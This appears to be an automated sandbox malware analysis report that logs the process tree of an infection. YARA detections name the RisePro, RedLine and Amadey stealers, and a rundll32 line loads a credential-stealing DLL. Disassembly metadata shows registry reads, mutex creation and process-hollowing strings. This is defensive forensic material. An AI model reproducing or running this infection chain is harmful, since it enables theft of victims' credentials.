                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:03:29:36
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                      Start time:03:29:36
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:03:29:42
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                      Start time:03:29:42
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
                                                                                                                                                                                                                                      Imagebase:0x120000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                      Start time:03:29:44
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                                                                      Imagebase:0x370000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 51%, Virustotal
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                      Start time:03:29:52
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                                                                                                                                                                                                                                      Imagebase:0xca0000
                                                                                                                                                                                                                                      File size:1'166'336 bytes
                                                                                                                                                                                                                                      MD5 hash:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                      Start time:03:29:53
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                      Start time:03:29:53
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                      Start time:03:30:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Imagebase:0x70000
                                                                                                                                                                                                                                      File size:1'905'152 bytes
                                                                                                                                                                                                                                      MD5 hash:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000032.00000003.3292101674.0000000004840000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                      Start time:03:30:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                                                                                                                                                                                                                                      Imagebase:0xaa0000
                                                                                                                                                                                                                                      File size:2'295'808 bytes
                                                                                                                                                                                                                                      MD5 hash:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                      Start time:03:30:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                                                                                                                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                                                                                                                      File size:97'792 bytes
                                                                                                                                                                                                                                      MD5 hash:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 77%, Virustotal
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                      Start time:03:30:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                      Start time:03:30:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:
                                                                                                                                                                                                                                      Has administrator privileges:
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:false

Target ID:55
Start time:03:30:06
Start date:19/04/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff6e2750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:56
Start time:03:30:06
Start date:19/04/2024
Path:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Wow64 process (32bit):true
Commandline:
Imagebase:0xfd0000
File size:97'792 bytes
MD5 hash:4CFD179519524269052023E10DE6B866
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 77%, Virustotal, Browse
Has exited:false

Target ID:57
Start time:03:30:06
Start date:19/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:58
Start time:03:30:07
Start date:19/04/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):
Commandline:
Imagebase:
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false


Execution Graph

Execution Coverage:4.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:5.1%
Total number of Nodes:568
Total number of Limit Nodes:22

Control-flow Graph

APIs
• RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00B85F0D
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00B85F3B
• RegCloseKey.KERNELBASE(?), ref: 00B85F47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: $($NtUnmapViewOfSection$VUUU$invalid stoi argument$ntdll.dll$stoi argument out of range
• API String ID: 3677997916-2979661614
• Opcode ID: e35067c3a75c68bb9732c276f72248155c9a72c0a609229799607dae41c579b7
• Instruction ID: 0eff55c8cbb69b7d84c6592a09e04f6bd1b2a5e95e101b7a19b5c465f082e652
• Opcode Fuzzy Hash: e35067c3a75c68bb9732c276f72248155c9a72c0a609229799607dae41c579b7
• Instruction Fuzzy Hash: 1DA23571A002089BEF18EF68CC85BEDB7F5EF45304F1045ADF915A7292DB75AA80CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00BB7BBA,?,?,?,?,?,00BB8C0E), ref: 00BB7BF7
Memory Dump Source
• Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 2eebc75514d11e51f29cc86cfba19c08e574dba16ea6afa4a732c77788a518e4
                                                                                                                                                                                                                                        • Instruction ID: 9656f0e00895888c851b0558ce0d0c92aad91b58f4c0652dca07b3899fdffe3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eebc75514d11e51f29cc86cfba19c08e574dba16ea6afa4a732c77788a518e4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABE08630549548AFCE357B14C878DF93B9DEB51341F000850FD0846222CFB5EC41C980
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c041415dad85de281349d153c26e8186ed89d566ba1bd7bf747097c0053eda1e
                                                                                                                                                                                                                                        • Instruction ID: 306a01a0b6b1d595c776e09dea0340cb15f36acdaa437224be225c919fcaaa0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c041415dad85de281349d153c26e8186ed89d566ba1bd7bf747097c0053eda1e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF0CDDF08C120AC612AC1822B6C6B6AB2FB2CF3307328536F607E2043A7D4174D6231
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 02f52c6b94ca54df50f3fca10c7e7639ec9db5f746eddf3eeb55125b2dc213df
                                                                                                                                                                                                                                        • Instruction ID: bdec2ced2e332d5f86b6efe0d87fc1a068d07c9a53c8202eda64dcddb94e481c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02f52c6b94ca54df50f3fca10c7e7639ec9db5f746eddf3eeb55125b2dc213df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9B1F5B190020CABEF24DF54CD84BEEBBF9EF44304F5045A9F915A7282DB749A84CB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 639 b89675-b89861 call b99090 call b85d40 call b88600 call b998b0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 7249dc24f626bdfc89015d4a5d9bd3b3276ee9d1e2dc5ced5ecaf7a6e160918d
                                                                                                                                                                                                                                        • Instruction ID: fbeace02bd0f81d6af72d38ac3fcf34d283dc1b38b1b362a7f0d07237cb0dea3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7249dc24f626bdfc89015d4a5d9bd3b3276ee9d1e2dc5ced5ecaf7a6e160918d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF3137717102049BEF18FB78CD8977DBBA6EB85310F244298E424AB3E2D7759980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 661 b89a14-b89a34 665 b89a62-b89a7e 661->665 666 b89a36-b89a42 661->666 669 b89aac-b89acb 665->669 670 b89a80-b89a8c 665->670 667 b89a58-b89a5f call b9ecf8 666->667 668 b89a44-b89a52 666->668 667->665 668->667 673 b8a3fb 668->673 671 b89af9-b8a3e6 call b99750 669->671 672 b89acd-b89ad9 669->672 675 b89a8e-b89a9c 670->675 676 b89aa2-b89aa9 call b9ecf8 670->676 677 b89adb-b89ae9 672->677 678 b89aef-b89af6 call b9ecf8 672->678 680 b8a423-b8a466 Sleep CreateMutexA 673->680 681 b8a3fb call bb82fa 673->681 675->673 675->676 676->669 677->673 677->678 678->671 681->680
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
